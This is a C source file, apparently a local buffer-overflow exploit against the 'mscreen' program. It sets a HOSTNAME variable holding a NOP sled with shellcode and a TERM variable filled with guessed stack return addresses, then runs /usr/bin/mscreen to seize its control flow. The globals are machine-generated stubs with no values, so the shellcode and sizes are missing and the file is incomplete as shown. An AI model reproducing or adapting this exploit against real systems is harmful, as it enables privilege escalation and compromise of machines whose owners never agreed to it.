
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int EGG ;
 int NOPDEF ;
 int SIZE ;
 int * buffer ;
 int * egg ;
 int esp ;
 int execl (char*,char*,int *) ;
 int get_esp () ;
 int memcpy (int *,char*,int) ;
 int memset (int *,int ,int) ;
 int nop ;
 int offset ;
 int printf (char*,...) ;
 int putenv (int *) ;
 char* shell ;
 int strlen (char*) ;
 scalar_t__ strtol (char*,int *,int ) ;
 int strtoul (char*,int *,int ) ;
 int x86_nop ;

int main (int argc, char *argv[]) {
    int i;
    if (argc > 1) offset += strtol(argv[1], ((void*)0), 0);
    if (argc > 2) nop += strtoul(argv[2], ((void*)0), 0);
    else
        nop = NOPDEF;
    esp = get_esp();
    memset(egg,x86_nop,EGG);
    memcpy(egg+300, shell, strlen(shell));
    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = 1; i < SIZE-4; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }
    memcpy(egg,"HOSTNAME=",9);
    memcpy(buffer,"TERM=",5);
    putenv(egg);
    putenv(buffer);
    printf("offset = [0x%x]\n",esp+offset);
    execl("/usr/bin/mscreen", "mscreen", ((void*)0));
    printf("exec failed!\n");
    return 0;
}
